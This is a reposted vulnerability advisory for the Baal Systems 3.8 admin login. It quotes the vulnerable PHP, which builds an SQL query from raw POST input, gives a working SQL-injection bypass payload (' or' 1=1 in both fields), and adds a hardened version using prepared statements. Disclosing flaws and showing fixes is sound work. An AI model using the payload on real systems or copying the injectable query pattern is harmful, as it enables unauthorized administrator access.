Baal Systems <= 3.8 (Auth Bypass): admin login bypass vulnerability
Posted by: admin | Posted on: February 8, 2010
Vulnerable file: adminlogin.php
Code:

```php
<?php
include("common.php");
if (!empty($_POST['password'])) {
    // Both values come straight from the POST body with no escaping or parameter binding.
    $username = $_POST['username'];
    $password = $_POST['password'];
    // The user-controlled strings are concatenated directly into the SQL text, so a
    // crafted username or password can rewrite the WHERE clause (SQL injection).
    $query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
    $result1 = db_query($query);
    $rows = db_num_rows($result1);
    $row = db_fetch_array($result1);
    // Any non-empty result set is treated as a successful admin login.
    if ($rows != 0) {
        // session_is_registered()/session_register() are deprecated and were removed in PHP 5.4.
        if (session_is_registered("whossession")) {
            $_SESSION['who'] = "admin";
            $_SESSION['userrole'] = "admin";
            $_SESSION['username'] = $username;
            $_SESSION['usernum'] = $row["userid"];
            header("location:admin.php");
        } else {
            session_register("whossession");
            $_SESSION['who'] = "admin";
            $_SESSION['userrole'] = "admin";
            $_SESSION['username'] = $username;
            $_SESSION['usernum'] = $row["userid"];
            header("location:admin.php");
        }
    } else {
        header("location:adminlogin.php?error=yes");
    }
} else {
?>
<!-- the original file continues with the login form HTML; it is not included on this page -->
```
Exploit: http://url/adminlogin.php
username: ' or' 1=1
Password: ' or' 1=1
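The fix is to stop building the query from user input. The following is an added example of a hardened adminlogin.php, not Baal Systems code: it assumes common.php provides a mysqli connection in `$db` and the prefix in `$tableprefix`, and that the password column stores password_hash() output instead of plaintext.

```php
<?php
// Added example (not from Baal Systems). Assumptions: common.php defines $db (mysqli)
// and $tableprefix, and tbluser.password holds password_hash() hashes.
include("common.php");

function adminLogin(mysqli $db, string $tableprefix, string $username, string $password): ?array
{
    // Identifiers cannot be bound as parameters, so restrict the prefix to a safe charset.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $tableprefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    // Bound parameter: the username travels separately from the SQL text, so input such
    // as  ' or' 1=1  is matched literally and can no longer alter the WHERE clause.
    $stmt = $db->prepare(
        "SELECT userid, password FROM {$tableprefix}tbluser WHERE username = ? AND userrole = 'admin'"
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // The password is checked in PHP against the stored hash; it never enters the query.
    if ($row === null || !password_verify($password, $row['password'])) {
        return null;
    }
    return ['userid' => $row['userid'], 'username' => $username];
}

session_start();
if (!empty($_POST['username']) && !empty($_POST['password'])) {
    $user = adminLogin($db, $tableprefix, $_POST['username'], $_POST['password']);
    if ($user === null) {
        header('Location: adminlogin.php?error=yes');
        exit;
    }
    session_regenerate_id(true); // fresh session id when privilege level changes
    $_SESSION['who']      = 'admin';
    $_SESSION['userrole'] = 'admin';
    $_SESSION['username'] = $user['username'];
    $_SESSION['usernum']  = $user['userid'];
    header('Location: admin.php');
    exit;
}
```

Migrating existing plaintext passwords to hashes is a separate one-time step; until that is done, the prepared statement alone already removes the injection.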
If you reprint this article, please credit the source: http://www.5iadmin.com/post/265.html